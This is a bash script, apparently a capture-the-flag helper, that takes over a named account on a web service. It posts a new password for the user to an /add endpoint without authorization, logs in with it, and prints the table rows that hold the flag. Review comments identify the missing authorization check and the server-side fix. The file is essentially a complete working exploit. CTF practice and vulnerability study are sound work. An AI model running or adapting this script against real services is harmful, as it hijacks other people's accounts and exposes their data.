#!/bin/bash
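# CTF helper: registers an additional password for USER through the service's
# /add endpoint, logs in with that password and prints the table rows of the
# landing page.
#
# Usage: SCRIPT PROTO HOST USER
#   PROTO  http or https
#   HOST   host[:port] of the service
#   USER   account name to act on
#
# NOTE(review): the flow only works if /add accepts a new password for an
# arbitrary user from a caller that presents nothing but a freshly generated
# `ctf` cookie. That suggests the endpoint lacks an authorization check tying
# the request to the account owner -- confirm against the service code. The
# service-side fix is to require an authenticated session for the user being
# modified.
#
# pipefail is deliberately NOT enabled: `head -c` closes the pipe early, so
# `tr` ends with SIGPIPE and the random-string pipelines would abort the
# script under pipefail.
set -e

if [ -z "$3" ]; then
  # Diagnostics go to stderr so stdout only carries the script's results.
  echo "Usage: ${0##*/} PROTO HOST USER" >&2
  exit 1
fi

case "$1" in
  http | https) ;;
  *)
    echo "Error: invalid PROTO value. Choose one of: http, https" >&2
    exit 1
    ;;
esac

proto="$1"
host="$2"
# Not named USER: assigning to USER would overwrite the login-name variable
# that is normally exported to child processes.
target_user="$3"

# Random alphanumeric strings; LC_ALL=C keeps tr byte-oriented on raw
# /dev/urandom data regardless of the caller's locale.
password=$(LC_ALL=C tr -dc 'A-Za-z0-9' </dev/urandom | head -c 13)
cookie=$(LC_ALL=C tr -dc 'A-Za-z0-9' </dev/urandom | head -c 32)

echo "Adding alternative password (hack) ..."
# URLs are quoted so HOST cannot be word-split into extra curl arguments.
# --fail turns an HTTP status >= 400 into a non-zero exit, so set -e stops
# the script instead of printing a success message after a rejected request.
# NOTE(review): -d sends the values as-is; a USER containing '&' or '='
# would alter the form body.
curl --fail "$proto://$host/add" \
  -d "address=http://some.site/&user=$target_user&password=$password" \
  --cookie "ctf=$cookie"
# The generated password is printed in clear text on stdout.
echo "Added alternative password $password for user $target_user"

echo "Logging in as $target_user ..."
# The cookie jar is written to the current directory and is left there; it
# holds a live session cookie after a successful login.
curl --fail "$proto://$host/" \
  -d "user=$target_user&password=$password&login=Login" \
  -c ./cookies.txt
echo "Login success"

echo "Getting flag ..."
# grep exits non-zero when no <tr> row is present, which ends the script
# under set -e before "Get success" is printed.
curl -s --fail "$proto://$host/" -b ./cookies.txt | grep -A4 "<tr>"
echo "Get success"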